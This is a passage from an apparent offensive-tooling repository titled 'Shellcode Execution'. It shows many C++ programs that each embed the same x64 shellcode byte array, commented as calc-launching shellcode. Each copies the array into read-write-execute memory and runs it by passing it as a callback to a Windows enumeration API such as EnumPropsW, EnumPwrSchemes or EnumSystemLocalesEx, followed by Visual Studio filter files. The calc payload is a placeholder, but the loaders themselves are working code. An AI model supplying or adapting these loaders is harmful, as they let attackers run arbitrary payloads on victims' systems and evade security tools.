&op[0], sizeof(op)); 34 | 35 | 36 | LOGFONTW lf = { 0 }; 37 | lf.lfCharSet = DEFAULT_CHARSET; 38 | 39 | 40 | HDC dc = GetDC(NULL); 41 | EnumObjects(dc, OBJ_BRUSH, (GOBJENUMPROC)address, NULL); 42 | 43 | return 0; 44 | 45 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumObjects/EnumObjects.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPageFilesW/EnumPageFilesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // alfarom256 calc shellcode 6 | unsigned char op[] = 7 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 8 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 9 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 10 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 11 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 12 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 13 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 14 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 15 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 16 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 17 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 18 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 19 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 20 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 21 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 22 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 23 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 24 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 25 | "\x63\x2e\x65\x78\x65\x00"; 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | ::RtlMoveMemory(addr, op, sizeof(op)); 34 | 35 | ::EnumPageFilesW((PENUM_PAGE_FILE_CALLBACKW)addr, NULL); 36 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPageFilesW/EnumPageFilesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPropsEx/EnumPropsEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | int err(const char* errmsg) { 6 | 7 | 8 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 9 | return 1; 10 | 11 | } 12 | 13 | // alfarom256 calc shellcode 14 | unsigned char op[] = 15 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 16 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 17 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 18 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 19 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 20 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 21 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 22 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 23 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 24 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 25 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 26 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 27 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 28 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 29 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 30 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 31 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 32 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 33 | "\x63\x2e\x65\x78\x65\x00"; 34 | 35 | 36 | 37 | int main() { 38 | 39 | 40 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 41 | ::RtlMoveMemory(addr, op, sizeof(op)); 42 | 43 | HWND dummy = ::GetTopWindow(NULL); 44 | ::EnumPropsExW(dummy, (PROPENUMPROCEXW)addr, NULL); 45 | 46 | 47 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPropsEx/EnumPropsEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPropsW/EnumPropsW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | int main() { 29 | 30 | 31 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | ::RtlMoveMemory(addr, op, sizeof(op)); 33 | 34 | HWND dummy = ::GetTopWindow(NULL); 35 | ::EnumPropsW(dummy, (PROPENUMPROCW)addr); 36 | 37 | return 0; 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPropsW/EnumPropsW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumPwrSchemes/EnumPwrSchemes.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "PowrProf.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 12 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 13 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 14 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 15 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 16 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 17 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 18 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 19 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 20 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | 32 | int main() { 33 | 34 | 35 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 36 | memcpy(address, &op[0], sizeof(op)); 37 | 38 | 39 | ::EnumPwrSchemes((PWRSCHEMESENUMPROC)address, NULL); 40 | 41 | return 0; 42 | 43 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumPwrSchemes/EnumPwrSchemes.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesExW/EnumResourceTypesExW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "KtmW32.lib") 7 | 8 | // alfarom256 calc shellcode 9 | unsigned char op[] = 10 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 11 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 12 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 13 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 14 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 15 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 16 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 17 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 18 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 19 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 20 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 21 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 22 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 23 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 24 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 25 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 26 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 27 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 28 | "\x63\x2e\x65\x78\x65\x00"; 29 | 30 | 31 | 32 | 33 | int main() { 34 | 35 | 36 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 37 | memcpy(address, &op[0], sizeof(op)); 38 | 39 | EnumResourceTypesExW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)address, NULL, RESOURCE_ENUM_VALIDATE, NULL); 40 | 41 | return 0; 42 | 43 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesExW/EnumResourceTypesExW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesW/EnumResourceTypesW.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | 6 | int err(const char* errmsg) { 7 | 8 | 9 | printf("Error: %s (%u)\n", errmsg, ::GetLastError()); 10 | return 1; 11 | 12 | } 13 | 14 | // alfarom256 calc shellcode 15 | unsigned char op[] = 16 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 17 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 18 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 19 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 20 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 21 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 22 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 23 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 24 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 25 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 26 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 27 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 28 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 29 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 30 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 31 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 32 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 33 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 34 | "\x63\x2e\x65\x78\x65\x00"; 35 | 36 | 37 | 38 | int main() { 39 | 40 | 41 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 42 | ::RtlMoveMemory(addr, op, sizeof(op)); 43 | 44 | ::EnumResourceTypesW(::LoadLibraryW(L"Kernel32.dll"), (ENUMRESTYPEPROCW)addr, NULL); 45 | 46 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumResourceTypesW/EnumResourceTypesW.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumSystemLocales/EnumSystemLocales.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | 29 | int main() { 30 | 31 | 32 | LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 33 | memcpy(address, &op[0], sizeof(op)); 34 | 35 | ::EnumSystemLocalesEx((LOCALE_ENUMPROCEX)address, LOCALE_ALL, NULL, NULL); 36 | return 0; 37 | 38 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumSystemLocales/EnumSystemLocales.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumThreadWindows/EnumThreadWindows.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | // alfarom256 calc shellcode 5 | unsigned char op[] = 6 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 7 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 8 | "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" 9 | "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" 10 | "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" 11 | "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" 12 | "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" 13 | "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" 14 | "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" 15 | "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" 16 | "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" 17 | "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" 18 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 19 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 20 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 21 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 22 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 23 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 24 | "\x63\x2e\x65\x78\x65\x00"; 25 | 26 | 27 | 28 | int main() { 29 | 30 | 31 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); 32 | ::RtlMoveMemory(addr, op, sizeof(op)); 33 | EnumThreadWindows(0, (WNDENUMPROC)addr, NULL); 34 | 35 | return 0; 36 | 37 | } -------------------------------------------------------------------------------- /Shellcode Execution/EnumThreadWindows/EnumThreadWindows.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/EnumTimeFormatsEx/EnumTimeFormatsEx.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "Crypt32.lib") 6 | 7 | // alfarom256 calc shellcode 8 | unsigned char op[] = 9 | "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" 10 | "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" 11 | 